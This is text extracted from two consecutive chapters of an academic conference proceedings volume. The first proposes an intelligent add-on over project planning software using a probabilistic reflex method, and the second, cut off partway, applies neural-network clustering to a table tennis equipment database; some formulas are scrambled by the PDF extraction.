1 Introduction Project planning is impossible without the use of software tools such as MS Project, Oracle Primavera P6, Clarizen, etc. Modern software calculates network graphs, builds Gantt charts, allocates resources depending on the time of project implementation, etc. But most of them implement formal algorithms, leaving the solution of intelligent problems to man. This makes significant demands on the professionalism of managers and specialists engaged in planning. It is no secret that most projects do not end according to the original work plan. And the reason for this is not only poor performance. The reason is also bad planning. Such planning does not take into account previous experience, current project conditions, human resources, reliability of suppliers, etc. To address these shortcomings, it is necessary to use modern artificial intelligence systems that would take on the task of analyzing previous project management experience, could interact with users in natural language, assess the capabilities of project participants and various threats. But there is a © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 149–161, 2023. https://doi.org/10.1007/978-3-031-35467-0_10
150
I. Teslia et al.
problem. If you create such an intelligent system with all the functions that are traditionally implemented by software tools, and supplement them with intelligent modules, the cost of developing such an integrated system will be too high for individual companies. And the lack of such tools in the project management software market suggests that this is too difficult a task even for companies such as Microsoft Corporation or Oracle Corporation. The problem can be solved the next way. Since planning software tools are already available, it is necessary to use their functions to create an intelligent software and information add-on over them [1, 2]. It will use the information of these tools, supplement it with information on the results of planning managers in previous projects, information on the work of human resources and suppliers on previous projects, perform intelligent analysis of this data, generate a realistic work plan and transmit it to the same software tools. Such an intelligent add-on, solving the problem of information support of project planning software tools, would interact with managers with the help of voice commands, would make decisions on the duration and relationship of work, give recommendations on resource allocation in project management so far. Many of the smart features that need to be implemented in such an add-on have already been implemented. In particular, natural language interfaces have entered human life and are used by many well-known companies [3]. They are used in the driving of cars [4], wheelchairs [5], control of smartphones and other technical devices [6]. In addition, systems that understand speech are introduced into robotic production environments [7], in the functioning of smart cities [8]. But the intellectualization of the project planning process requires not only a natural language interface, but also the ability to solve creative problems. For example, there some developments on solving local intelligent problems such as decision support and data mining. Thus, in the works [9–11], the prospects of integration of artificial intelligence technologies in project management are presented. A number of works are devoted to the use of expert systems in the management of enterprises and business environments [12–15, 19]. But their scope does not intersect with the tasks of project planning, so it is impossible to apply them in this area. In general, it can be stated that today there are no functionally complete intelligent project planning systems. And there are no intelligent add-ons to project planning software tools that fully solve the creative tasks of project management: determining the relationship between project work, allocating resources and estimating the time required to complete each work, risk assessment and opportunities to implement project. Therefore, there is an unrealized part of research in the field of project management information technology. This work is devoted to the issue of creating a concept for the development of an intelligent add-on over project planning tools. The aim of the work is to develop the concept of an intelligent add-on over project planning tools. To achieve this goal, it is necessary to solve the following tasks: to formulate the principles and tasks of intellectualization of the project planning process, to develop the structure of intelligent project planning technology and to propose tools for its implementation.
Development of the Concept of Intelligent Add-On
151
2 Materials and Methods The object of research in the paper is the processes of project planning. The subject of research is an intelligent add-on over project management software tools. The result of the research should be the concept of an intelligent add-on over project management software tools. The creation of such a concept should be based on certain approaches and principles of its construction. 2.1 Approach and Principles of Creating an Intelligent Add-On over Project Planning Software Tools At the heart of any concept should be the approach and principles that determine the vision of its scope, mechanisms and tools for its implementation, the place in the subject area. It is clear that the intelligent add-on is part of the project planning system. Therefore, its creation should be performed using the ideas and methods of a systems approach. From the point of view of building a functional system within the project planning processes, the following functions can be distinguished: 1. 2. 3. 4. 5. 6.
Forming a task to develop a project plan. Collection and analysis of information to develop a project plan. Development of calendar-network schedule (CNS). Calculation of the calendar-network schedule. Alignment of the project plan. Approval of the project plan.
The implementation of the above functions of the project planning system will contain 1. The principle of improvement. The result of using an intelligent add-on is to increase the professionalism of the process and the accuracy of the project planning result. This will be achieved through the use of the company’s information standard, which influences the choice of decisions on the current project, based on what decisions were made in previous projects and what was the actual result, as well through the use of intellectualization of the planning process. 2. The principle of entry. The intelligent add-on is part of the company’s project planning system and will take into account existing tools used in project teams. 3. The principle of addition. Intelligent add-ons should complement existing project planning tools, rather than replacing those functions that are already implemented in them. 4. The principle of convenience. The intelligent add-in should include a user-friendly intelligent interface with the project team. Regardless of the level of computer education (even in case of low level), managers must be able to communicate their vision of the project to the intelligent add-on and receive answers in a convenient and understandable way. 5. The principle of systematicity. Intelligent add-on is part of the organizational and technical system of project management. Therefore, it must take into account the
152
I. Teslia et al.
technological requirements and features of the implementation of such a system and be able to exchange information with other means of such a system. Following the formulated principles, we can correctly determine the tasks that will be solved in the intelligent add-on. 2.2 Stages and Tasks of Project Planning Using an Intelligent Add-On The purpose of any planning system is to coordinate actions to address project objectives both in terms of product formation and in terms of ensuring the formation of the project product [17]. To achieve this goal, the project planning system must: obtain information from managers to calculate the plan; use the information standard of a project-oriented company take into account previous experience in planning and implementing project plans; be able to integrate and analyze data obtained from project managers and the information standard in order to highlight the most reliable information; calculate the project plan; bring the project plan to the executors, make changes to the project plan if it is not implemented. These functions must be implemented both in project management software tools and in the intelligent add-on. To implement them, the intelligent add-on of the project management tools must solve the following problems: 1. Process and analyze information from managers and specialists (mostly in natural language), documentation (formalized and natural), information standard of the company (formalized) and generate an array of data (by calculating decisions on the project plan) to calculate the calendar-network schedule. 2. Learn to plan. 3. Administer the process of aligning and approving the project plan. 4. Evaluate performance through monitoring decisions. 5. Correct the decision. Based on these tasks, project planning technology which will be based on software tools, information standard tools and intelligent add-ons over them can be represented by the structure shown in Fig. 1. Within the framework of the given project planning technology there are six main stages: 1. 2. 3. 4. 5. 6.
Preparation of information for planning. Development of a plan. Evaluation of the plan. Approval of the plan. Performance evaluation. Adjustment of the plan upon execution. These stages will be implemented in three components:
1. Intelligent add-on. 2. Information standard.
Development of the Concept of Intelligent Add-On
153
3. Project management software tools. Moreover, stage 1 is implemented both in the information standard of the company and in the intelligent add-on. Stages 3, 4 and 5 are implemented only in the intelligent add-on, and stages 2 and 6 are in the software tools for project management. Based on this, the intelligent add-on should implement tools that can be used to develop a calendar-network schedule, evaluate the calculated plan and its implementation and monitor administrative procedures for its agreement and approval. Consider the tools that will solve these problems.
Fig. 1. The structure of project planning technology based on an intelligent add-on over software tools
2.3 Tools for Implementing Intelligent Project Planning Technology The tasks listed in Sect. 2.2 are usually solved using various methods and means of artificial intelligence. In particular 1. Communication with a person on the topic of creating and calculating a calendarnetwork schedule in natural language – methods of computational linguistics. 2. Learning intelligent add-on – Machine Learning. 3. Information analysis – statistical and cybernetic methods of Data Mining. 4. Making decisions on the project plan, evaluating, adjusting and administering them – using the tools of decision support systems (DSS). Creating an intelligent add-on that combines these tools is a very difficult task. And the cost of such an add-on would be very high. After all, the tasks that need to be solved in the intelligent add-on are different in terms of functional implementation and information content. This excludes the possibility of creating a single core of their solution, either on the basis of a neural network or with the use of knowledge bases.
154
I. Teslia et al.
But in Subsect. 2.2 it has been shown that the planning system can be divided into 3 main components: project management tools, intelligent add-on, information standard. Accordingly, we need to integrate 3 key tools into a single system. Previous experience in the development of information technology project management allows us to offer as the following tools: MS Project (project management toolkit); PrimaDoc (for maintaining the information standard) [2]. But to create an intelligent add-on, it is proposed to use the ideas of creating reflective intelligent systems [18], in particular the system of reflex action identification in project planning systems [16]. The main feature of this system is the ability to simultaneously process different types of input data from separate sources as a single input stream with the production of reflexes to arbitrary combinations of elements of this data that is most suitable for processing the incoming data flow from managers, formalized and natural information from project documents, statistical information from the information standard and regulatory information of project implementation. Consider the problem of developing a response to the flow of arbitrary input data in the solution of intelligent problems. 2.4 Development of Reactions to the Flow of Input Data According to the Project Plan in the Intelligent Add-On Under the reaction of the intelligent add-on we will understand the output data flow, which corresponds to the task and which will contain information about the project plan: 1. 2. 3. 4.
Project tasks. The sequence of project tasks. Parameters of project tasks (time, costs, volume). Resources for project tasks and their scope. The reaction of the intelligent add-on is influenced by the following factors:
1. Content of information from experts (managers and specialists of the project team), which is usually provided in natural language text. Content is a factor influencing the reaction of the intelligent add-on. 2. Documentation on the project (design and estimate, design and technological one, backlog of the product, etc.), which is presented both in formal form (usually tables) and in natural language form. Elements of documentation are also factors influencing the response of the intelligent add-on. 3. Data from the information standard, reflecting the progress of planning and implementation of the company’s projects in the past. The response of an intelligent system cannot be described as a deterministic function, because there are always alternative solutions for project planning, which depend, inter alia, on random influences. Moreover, the result of the decision, which is made on the basis of the reactions of the intelligent add-on, can be assessed only after its implementation and even then, depending on other decisions made. In real conditions, such an assessment can only be given by the project team that is responsible for its outcome. Therefore, the evaluation of the reaction will be presented due to the probability of approval by the team of decision managers that correspond to the reaction of the
Development of the Concept of Intelligent Add-On
155
intelligent add-on. If n factors are taken into account when solving the problem τi , then for each reaction Rj we have a conditional probability ∀Rj , F1τi F2τi F3τi ∃u Rj /F1τi F2τi F3τi , (1) where Rj is the reaction of the intelligent add-on; F1τi are factors influencing the response of the intelligent add-on in solving the problemτi , related to the information provided by experts (project team); F2τi are factors influencing the response of the intelligent add-on in solving the problemτi , related to the project documentation; F3τi are factors influencing the reaction of the intelligent add-on in solving the problemτi , which are formed by data from the information standard; u Rj /F1τi F2τi F3τi is estimation that the reaction Rj will be accepted by the project team if the decision is due to the influence of factors F1τi F2τi F3τi . The decisive rule for the choice of reaction in the intelligent add-on Rj max u Rj /F1τi F2τi F3τi . (2) j
To solve this problem, it is necessary to relate the factors to the reactions with numerical values that will characterize the magnitude of the impact of each factor on each of the reactions. This value may be based on the deviation of the probability of reaction in the event of a factor from the conditional probability of reaction in its absence. Thus, for the factor fkl ∈ Fkτi the influence solution of the problem τi is determined on the τi τi by the difference between p Rj /fkl , p Rj /fkl ikj = ω p Rj /fklτi , p Rj /fklτi ,
(3)
where ikj is the magnitude of the influence of the factor fklτi on the solution of the problem τi ; ω is the function of determining the magnitude of the impact; fklτi is the absence of the factor fklτi , when solving the problem τi . Formulas (2) and (3) define the rule: if the decision is influenced by factor A, it is probably necessary to produce a reaction B, which is very close to the rules and mechanisms of reflexes in the living world. Therefore, the intelligent add-on will also need to produce reflexes to various input factors. The teacher will have to indicate how he would react to this or that input information. The intelligent add-on itself must learn to identify the key factors that determine a reaction. To calculate the magnitude of the influence of many factors and the choice of response that will meet the objectives of the project and will be accepted by the project team, it is proposed to use the reflex method [18]. But for this it must be adapted to the tasks. After all, the intelligent add-on will consider all the factors, including those related to the input documentation and information standard, and not only those that correspond to the appeals to the add-on members of the project management team. Therefore, we will make changes to the reflex method [18] taking into account the problem that will
156
I. Teslia et al.
be solved by an intelligent add-on using managerial information, documentation and information standard. 1. The magnitude of the influence of the factor fklτi on the reaction Rj in solving the problem τi will be equal to: provided 0 < p Rj /fklτi < 1, 0 < p Rj /fklτi < 1: (4) ∀Rj , fklτi : ikj
p Rj /fklτi − p Rj /fklτi = 2 · p Rj /fklτi · 1 − p Rj /fklτi · p Rj /fklτi · 1 − p Rj /fklτi
2. The influence of all factors vkτi =
j
ikj ,
(5)
where vkτi is the magnitude of the influence of all factors on the reaction Rj in solving the problem τi . 3. Estimation of the probability of choosing the reaction Rj , which corresponds to the magnitude of the influence of all factors: ∀Rj : pτi Rj = 0, 5 +
vτi k , 2 2 · vkτi + 1
(6)
where pτi Rj is an estimate of the probability of choosing the reaction Rj when solving the problem τi . 4. Estimation of the possibility of choosing the reaction Rj when solving the problem τi : pτi Rj + p Rj /fklτi − 1 ∀Rj : uij = , (7) τi τi τ τ i i 2 · p Rj · 1 − p Rj · p Rj /fkl · 1 − p Rj /fkl provided 0 < p Rj /fklτi < 1, where pτi Rj is an estimate of the probability of choosing the reaction Rj when solving the problem τi . 2.5 Using the Company’s Information Standard for Adaptive Project Planning In [2] the model of definition of planned parameters of new projects with use of the information standard of project management is offered. This model should be integrated into the intelligent add-on by defining characteristics that affect the parameters of the new project plan. In the model determining the planned parameters of new projects (qj )
Development of the Concept of Intelligent Add-On
157
on the parameters of completed projects is performed based on the use of the following data: 1. Duration of work (q1 ). Ii is based on indicators set by experts (managers and specialists) taking into account the deviation of the actual duration from the planned (set by the same experts) in previous projects. For example, if the actual duration of work in previous projects exceeded by 50% the planned duration set by the same expert, and in the current project the expert predicts that the work will be performed in 20 days, it should be expected that the work will be performed in 30 days (50% longer). In addition, the duration of work can be determined on the basis of the actual duration of the same work in previous projects, taking into account the work efforts. If in the previous project the work on the installation of 2 lathes was performed for 20 days, in the new project, for the installation of 1 lathe it is necessary to allocate 10 days. 2. The need for resources (q2 ). As well as the duration of work, it is determined on the basis of indicators set by experts, with clarification on the scope of work and taking into account the “inaccuracy” of experts in previous projects. 3. Procurement of material resources (q3 ). It is determined on the basis of indicators set by experts in the current project, taking into account the deviation of the actual delivery dates from the planned ones for the same suppliers, which were set by the same experts in the past. 4. Risk assessment (q4 ). It is performed on the basis of expert assessment, adjusted for the deviation of the risk assessment in previous projects from the actual costs of them, and the influence on the project. To determine the influence of the parameters of the information standard on the planned indicators of the current project, a random function with normal distribution is used: (xji −μj )2 1 2σj2 , (8) pji = √ e σj 2π where pji is the estimate of the probability of accepting the value of x ji for the parameter qj from the company’s information standard; μj is the mathematical expectation of the parameter qj ; σ j is the variance of the parameter qj . The values of mathematical expectation and variance for formula (4) are obtained from the set of values of the parameter qj in the information standard of the company. In the process of using the company’s information standard in the intelligent add-on, for each value of x ji (formula (8)) from the listed parameters of the project plan, an assessment of its choice (by formulas (4)–(7)) is calculated. This takes into account the influences of documentation and management teams (see Sect. 2.4).
3 Experiments The developed concept and means of intelligent add-on have passed experimental testing on real projects and have shown their effectiveness in the project planning process [2, 16]. Experimental studies have been conducted in accordance with the components of such an add-on in two directions – maintaining the company’s information standard [2] and processing natural language information in project planning tasks [16].
158
I. Teslia et al.
Experimental studies of natural language information processing technology in project planning tasks were conducted on real projects by forcibly distorting incoming natural language information in order to assess the effectiveness of intelligent add-on in real conditions associated with inaccuracy, incompleteness, invariance of information received in such planning systems. This allowed to test the proposed concept in practice and identify ways to create an instrumental intelligent add-on over the means of project management [16]. Research was conducted with 2 developer projects. The duration of one is 540 days, the other is 160 days. The projects contained 1,221 works, about 1,000 links. Resources were used in 919 works. In the experiment, about 3,300 requests were used for the formation of the project plan. Requests for projects were directed to: creating a project, creating works, creating resources, establishing links between works, distributing resources by works and setting their parameters: determining the duration of works, the number of resources, lead/lag time of works. The probability of a correct system response reached 0.97. This concept and set up for the construction and use of information standard project management in project-oriented companies PrimaDoc system was implemented in PAT Tutkovsky. The system was used to create an information standard for geophysical instrumentation projects. Documentation was submitted, which included descriptions of devices and manufacturing technologies. In addition, information was entered regarding the manufacturing process itself – the duration of individual stages and the number of resources used. In essence, the information standard of project activities for the manufacture of geophysical instruments was formed [2].
4 Results The principles and tasks of intellectualization of the project planning process are formulated. The structure of intelligent project planning technology has been developed. The tools of its realization are offered. This allows to achieve the goal of the study – to create a concept of intelligent add-on over the tools of project planning. The concept has been tested in experimental research and practical implementation in Ukrainian enterprises. Within the framework of experimental research, 2 projects were used, in which the names of the works were more than 90% unique, and the names of the resources were generally different. In total, the project schedules contained 1,221 tasks (LC contained 257 works, and BC – 964 works) with about 1,000 connections. Resources were used in 919 tasks. Incoming project requests included creating a project, tasks and resource list, linking work, allocating resources to work, and setting numerical parameters: duration of work, amount of resource, lag of work, in total about 3,300 commands. Experimental studies have shown the high efficiency of recognizing the content of natural language appeals. The probability of correctly determining the substantive scenario in the control sample, which included parts of the two projects, reached 92.68% management [16]. The practical implementation of the PrimaDoc project management information standard creation and use system in the project-oriented company PAT Tutkovsky showed that the project implementation of 6 months with the traditional approach required archiving relevant information for future projects about 200 h. When using the PrimaDoc system,
Development of the Concept of Intelligent Add-On
159
the time spent was as follows: formation of the structure of the information standard of project management and templates for entering information into the information system – about 10 h; introduction of commands for entering information into the information standard of project management – for about 40 h (0.25 h per day) [2]. The results of experimental research and practical implementation have shown that the developed concept allows for lower costs and more accurate use of information resources of companies to develop realistic project plans. The main scientific result of the research is that a new approach to the creation of intelligent project planning systems is proposed. It consists in the development of an intellectual add-on over the instrumental software tools of project management, which will take over a number of functions of the project manager. On this basis, a twocomponent structure of project planning information technology is proposed. A new scientific result is also a modified reflexive method of construction intelligent systems. Unlike previous implementations, it takes into account the simultaneous influence of 3 groups of factors that have different informational nature. The high efficiency of project planning problem solving, demonstrated in experimental studies, opens wide prospects for the application of a reflexive approach to the creation of intelligent systems in digital project management. Expanding the scope of application of reflexive intelligent systems in project management will allow to solve most of the management tasks that project managers solve today. And they will do it better than them. This, in turn, opens the way to digital project management.
5 Discussion These results allow to achieve the goal of the study, namely to create the concept of an intelligent add-on over the tools of project planning. The limitations inherent in this study are related to the narrow scope of the concept only for project planning tasks. The disadvantage of the study is that it is based on information-probabilistic methods of estimating input information, forecasting the status of the project and making rational decisions on the order of work, their duration and resource content. And methods of building expert systems, in particular, knowledge base, are not used. But on the other hand, this approach makes it possible to create effective intelligent systems capable of reacting to informational influences of various nature and independently adapting to changes in incoming information. And when using knowledge bases, this requires the participation of an expert. In addition, the labor-intensiveness of creating reflective intellectual systems is an order of magnitude less than the labor-intensiveness of creating expert systems, with a sufficiently high efficiency of solving intellectual problems. In addition, the proposed concept only allows to supplement project management systems with intelligent add-ons and does not offer new methods of project planning, although it allows to solve the scientific and practical problem of forming timely, reliable and complete information for project planning not only from the documentation, but also from the expert assessment of its parameters and experience in planning and implementing previous projects. But despite these limitations and shortcomings, the developed concept has successfully passed experimental and practical testing.
160
I. Teslia et al.
6 Conclusions Research was conducted on the creation of the concept of an intelligent add-on to project management software tools, which required the use of: project management methods to design tasks for the development, aligning and approval of the project plan; critical path method – for the development and calculation of CNS; information technology methods – to gather information for project development; methods of data mining – to analyze information to develop a project plan. In addition, an intelligent interface was created for teams to interact with project planning tools, using computational linguistics. The basis for decision-making in the intelligent add-on modules that implement these functions was a modified reflex method, which allowed on the basis of information accumulated in previous projects and expertise to assess the impact of various factors on the structure and parameters of the project plan. All this has become the foundation for a new scientific result, essence of which is the development of methodology and technology of project management by developing a new concept of creating an intelligent add-on to project management software, which includes principles, approach, structure, model and tools for project planning. The obtained result differs from the existing ones in that it allows to intellectualize the project planning process, use tools that produce effective decisions on the structure and parameters of project work, which reduces the probability of non-implementation and changes in approved plans. In fact, the concept of intelligent add-on has combined into one conceptual, methodological, technological and information space approach principles, models, methods and tools of project planning. The value of the proposed concept is that it can be used to improve existing project management systems based on the use of modern information technology. That allows to use the principles, approach, structures and technologies offered in the concept in the companies of other countries of the world which use software tools of management of projects (in particular MS Project), and not only in Ukraine.
References 1. Teslia, I., Kubyavka, L., Yegorchenkov, O., Yegorchenkova, N.: Software and information add-ons in the management of portfolios of projects and programs. Sci. Collect.: Inf. Processes Technol. Syst. Transp. 1, 11–24 (2014) 2. Teslia, I., Yegorchenkova, N., Yegorchenkov, O., Khlevna, I., Kataieva, Y., et al.: Development of the concept of construction of the project management information standard on the basis of the PrimaDoc information management system. East.-Eur. J. Adv. Technol. 1/3(115), 53–65 (2022) 3. Hildebrand, C., Efthymiou, F., Busquet, F., Hampton, W., Hoffman, D., Novak, T.: Voice analytics in business research: conceptual foundations, acoustic feature extraction, and applications. J. Bus. Res. 121, 364–374 (2020). https://doi.org/10.1016/j.jbusres.2020.09.020 4. Cui, Zh., Gong, H., Wang, Ya., Shen, Ch., Zou, W., Luo, Sh.: Enhancing interactions for in-car voice user interface with gestural input on the steering wheel. In: 13th International Conference on Automotive User Interfaces and Interactive Vehicular Applications, pp. 59–68 (2021). https://dl.acm.org/doi/https://doi.org/10.1145/3409118.3475126
Development of the Concept of Intelligent Add-On
161
5. Long, Yi., Peng, Ya.: Development and validation of a robotic system combining mobile wheelchair and lower extremity exoskeleton. J. Intell. Robot. Syst. 104, 5 (2022). https://doi. org/10.1007/s10846-021-01550-8 6. Ng, S.-C., et al.: An intelligent mobile application for assisting visually impaired in daily consumption based on machine learning with assistive technology. Int. J. Artif. Intell. Tools 30(01), 2140002 (2021). https://doi.org/10.1142/S0218213021400029 7. Birch, B., Griffiths, C., Morgan, A.: Environmental effects on reliability and accuracy of MFCC based voice recognition for industrial human-robot-interaction. Proc. Inst. Mech. Eng. Part B: J. Eng. Manuf. 235(12), 1939–1948 (2021). https://doi.org/10.1177/095440542110 14492 8. Al-Amri, R., Murugesan, R.K., Alshari, E.M., Alhadawi, H.S.: Toward a full exploitation of IoT in smart cities: a review of IoT anomaly detection techniques. In: Proceedings of International Conference on Emerging Technologies and Intelligent Systems (ICETIS), pp. 193–214. (2021). https://doi.org/10.1016/j.scs.2017.12.034 9. Khaled, M.A.M.: Applications of artificial intelligence in project management. Rel. Alberto De Marco, Filippo Maria Ottaviani. Politecnico di Torino, Corso di laurea magistrale in Ingegneria Gestionale (Engineering and Management) (2021). https://webthesis.biblio.pol ito.it/18431/ 10. Morozov, V., Mezentseva, O.: Development of optimization models of complex infocommunication projects based on data mining. In: IEEE International Conference on Smart Information Systems and Technologies (SIST), pp. 1–7 (2021). https://doi.org/10.1109/SIST50301.2021. 9465991 11. Kovtunenko, Y.V.: Application of artificial intelligence in the enterprise management system: problems and advantages. Econ. J. Odessa Polytech. Univ. 2(8), 93–99 (2019). https://doi. org/10.5281/zenodo.4171114, https://economics.opu.ua/ejopu/2019/No2/93.pdf 12. Kapli´nski, O., Zavadskas, E.: Expert systems for construction processes. Statyba 3(12), 49–61 (1997). https://doi.org/10.1080/13921525.1997.10531367 13. Starukh, A.I.: Application of expert systems in the business environment. Scientific Bulletin of the International Humanities University, pp. 114–121 (2020). http://www.vestnik-econom. mgu.od.ua/journal/2020/41-2020/17.pdf 14. Shorikov, A.F.: Expert system of investment design. Appl. Inform. 5(47), 96–104 (2013) 15. Shorikov, A.F.: Technology for the development of a computer expert system for business planning. Bull. Perm Sci. Cent. 2, 78–82 (2016) 16. Teslia, I., Yehorchenkova, N., Khlevna, I., Yehorchenkov, O., Kataieva, Y., Klevanna, G.: Development of reflex technology of action identification in project planning systems. In: International Conference on Smart Information Systems and Technologies, Nur-Sultan (2022). https://sist.astanait.edu.kz/ 17. Teslia, I., et al.: Method development of coordination of design and operational activities in the process of manufacturing complex scientific computer products. East. Eur. J. Adv. Technol. 6(114), 83–92 (2021) 18. Teslia, I., Pylypenko, V., Popovych, N., Chornyy, O.: The non-force interaction theory for reflex system creation with application to TV voice control. In: 6th International Conference on Agents and Artificial Intelligence, LERIA, France, pp. 288–296 (2014) 19. Ryzhakova, G., Chupryna, K., Ivakhnenko, I., Derkach, A., Huliaiev, D.: Expert-analytical model of management quality assessment at a construction enterprise. Sci. J. Astana IT Univ. 3, 71–82 (2020). https://doi.org/10.37943/AITU.2020.69.95.007
Self-organization of the Table Tennis Market Information Bank Based on Neural Networks Valeriy Tazetdinov(B) , Svitlana Sysoienko, and Mykola Khrulov Cherkasy State Technological University, Cherkasy, Ukraine [email protected], [email protected]
Abstract. The tasks to be solved by the information-analytical system of selection of table tennis equipment are being set. The information bank contains information about the properties of rubbers and blades, as well as known combinations of rubbers and blades. Procedures for classifying input information of table tennis equipment, which allow to remove the least significant factors from the database, are proposed and the corresponding algorithms are given. A method of analytical information processing, which shows the list of table tennis equipment that the player needs, is developed. It gives a possibility to forecast the development trends of the table tennis equipment market, manufacturers to plan and change the structure of production, buyers (players) and sellers to fully meet the information needs. The method for self-organization of the information bank based on the result of solving the clustering problem, which is obtained using Kohonen self-organizing network, is developed. Keywords: Neural network · Self-organization · Clustering · Neural network system · Information bank
1 Introduction Modern trends in the table tennis market are due to a number of reasons that are determined by the behavior of its subjects. Nowadays, there is a great variety of equipment for table tennis. According to information [1, 2] more than 100 manufacturers of table tennis blades are represented on the market [3]. Also there are more than 80 manufacturers of table tennis rubbers. Each manufacturer has his own model range, which can include 74 rubbers and more than 300 blades (for Butterfly). With such a variety of table tennis equipment, the selection of blades and rubber becomes a very difficult task for a player. As practice shows, most players are not able to successfully formulate equipment requirements. In practice, the players can evaluate the equipment only after its practical use based on their own feelings and gaming experience [4]. At the same time there is a rapid growth of modern innovative technologies and their application in everyday life, automation of all spheres of human activities. In such conditions, the correct selection of a combination of rubbers and a blade acquires special value [5]. The creation of information banks, which will contain data on table tennis equipment, both on sale and already sold out and withdrawn from production, will identify the © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 162–174, 2023. https://doi.org/10.1007/978-3-031-35467-0_11
Self-organization of the Table Tennis Market
163
equipment that is most in demand and best suited for the buyer in terms of price, quality, justify its value and identify trends in the table tennis market. The methods of analytical data processing will simplify for buyers (players) the choice of the necessary equipment and improve the quality of service. Ukrainian and foreign scientists have achieved significant results in solving the problems of analysis of complex systems, which is the table tennis market, as well as selection of necessary table tennis equipment and future scenarios for table tennis market development. In particular, in the works of V.M. Glushkov, M.Z. Zgurovsky, T. Kohonen, T. Saati, D. Cowan, J.A. Hertz [6] the models and methods for identification of processes in dynamical systems are developed. The analysis of a wide range of tasks solved by the subjects of the table tennis market, the complexity of the process of choosing the right equipment and the dynamics of the environment on both objective and subjective processes indicate the need for conceptual restructuring of information services and analytical support. The aim of the work is to develop a method of information-analytical processing, which allows to remove insignificant factors from the information bank.
2 Problem Statement It is known that the information base is a vector of fields X = (X 1 , X2 , . . . , Xn ), which are the main factors influencing the playing properties of the bat. X1 , X2 , . . . , Xn may be such parameters for rubbers as speed, spin, control, sponge hardness, type of sponge and for blades it may be delay of the ball on the surface of the bat, sweet spot, number of layers, speed, control, etc. We will consider that after certain transformations and consolidation of the information in the qualitative form, all factors are presented by numerical values. As a result of this type of formalization, the entropy of the encoded data will be maximized. It is known that of all the statistical distribution functions, the uniform distribution has the largest entropy. That is why, after normalization, the data must evenly fill a single interval. With this method of modification, all factors will carry the same information load. Thus, the first task of identifying the dependence of parameter Z, which takes into account the speed, rotation and control as an output characteristic of the input factors, formally is to determine the function Z = F(X1 , X2 , . . . , Xn ).
(1)
The least squares method, methods of self-organization of models with a typical representative - the method of group consideration of arguments, trend analysis and approximation by Fourier series are known for solving such problems. The second problem is the problem of determining the sensitivity coefficients of the parameter Z which takes into account the speed, rotation and control, that is, the definition fk =
∂Z fk Xk , bk = , k = 1, n, ∂Xk Z
(2)
164
V. Tazetdinov et al.
where fk is the absolute sensitivity factor; bk is the relative sensitivity factor; Xk , Z are the average values of the k-th factor and the initial characteristic, respectively, for a certain class of table tennis equipment, which is determined by an expert. Features of problems (1)–(2) are: a significant number of input factors (average 20), the presence of noise effects in the initial data, the presence of non-trivial relationships between the output characteristic and the composition of input factors, the need for preprocessing of initial data. Solving problems (1)–(2) is necessary in the development of information and analytical support of processes in the table tennis market and will allow to analyze its condition and greatly simplify the selection of table tennis equipment.
3 Information Bank Optimization Self-organization of the information bank [7] is to bring out uninformative, insignificant factors and remove them. It is performed using neural network technologies. To do this, we solve the problem of clustering [8], which consists in defining groups (clusters) of input vectors that have certain common properties. The biggest advantages of neural networks [9] include their flexible structure. Studying modern developments in the field of information technology, we see that there is a large number of algorithms that are designed for specific criteria and requirements. Input vectors include input factors and output characteristics, which in our problem are as follows (X1 , X2 , . . . , Xn , Z). The task of clustering [10] plays an important role for the selection of table tennis equipment. This task looks like this. Let it be ϑi, i = 1, m, the equipment (blades, rubbers) which is contained in the data bank. Every piece of equipment is inherent by many parameters X1i , X2i , . . . , Xni . Empirically the table tennis expert sets the quantity of clusters K. As a rule K ∈ {3, 4, 5, 6, 7}. To create groups with common properties, the input set of data must be shortened to a special form without dimensions. Since in subsequent studies we are not going to investigate the pieces of equipment with extreme values of parameters, i.e. there is no such ϑi, i > m, and such j ∈ {1, 2, . . . , n} that / θi , where θi is a set of parameters of the j-th factor, the assessment formula is as Xij ∈ follows:
X =
X − Xmin . Xmax − Xmin
(3)
It is possible that the law of assessment may be one of the next
X =
X −m 1 ,X = , σ 1 + e−X
(4)
where m is an arithmetic mean, σ is a normal deviation. In some cases the assessment is being executed with the use of a two-transformation composition. Clustering at a fixed value is shown in Fig. 1. We suppose that the task has no general restrictions and that Xj ∈ θi = [0, 1], j = 1, n. A cluster is an association of substances ω, such that the mean square of the
Self-organization of the Table Tennis Market
165
Fig. 1. Clustering at a fixed value
intragroup distance to the center of the group is less than the mean distance to the common center in the input set of substances, i.e. dω2 < σ 2 where dω2 =
1 1 2 (Xi − Xω ) , Xω = Xi . Xi ∈ω Xi ∈ω N N
(5)
The solution of the clustering problem is to determine ϕ(i) that identify the group number by index: m m ϕ(j) ϕ(i) min (6) j = 1 ϑi − ϑj . i=1 j>i Define a benchmark bat as a bat with a set of characteristics that forms an idea of the average object in an information bank. For example, it may be Butterfly Viscaria blade with Butterfly Tenergy 05 rubbers for offensive style of play. Assuming that one of the factors has a fixed value, the standard is the bat with the best playing properties in a particular cluster. If the number of clusters is K, standards Xei , i = 1, K in each cluster Q1 , Q2 , . . . , QK and criterion functions are considered, the classes of table tennis equipment are automatically determined. If as a result of the preliminary analysis it is established that the names of inventory with the fixed value of the factor are in the greatest demand, then it is necessary to solve the problem of classification which is formulated so: find min
K
Xe
i=1
di ,
(7)
where di is the distance between the piece of the equipment of the i-th class and the corresponding standard, and di =
mK j=1
Xj − Xei
2 21
,
(8)
166
V. Tazetdinov et al.
where Xei is the coordinate of the standard in the i-th class. Obtaining its solution will determine the classification of table tennis equipment. Formally, one cluster includes images, the distance between which is not more than some positive number. Images of such a cluster belong to the hypersphere (Fig. 2).
Fig. 2. Image clustering
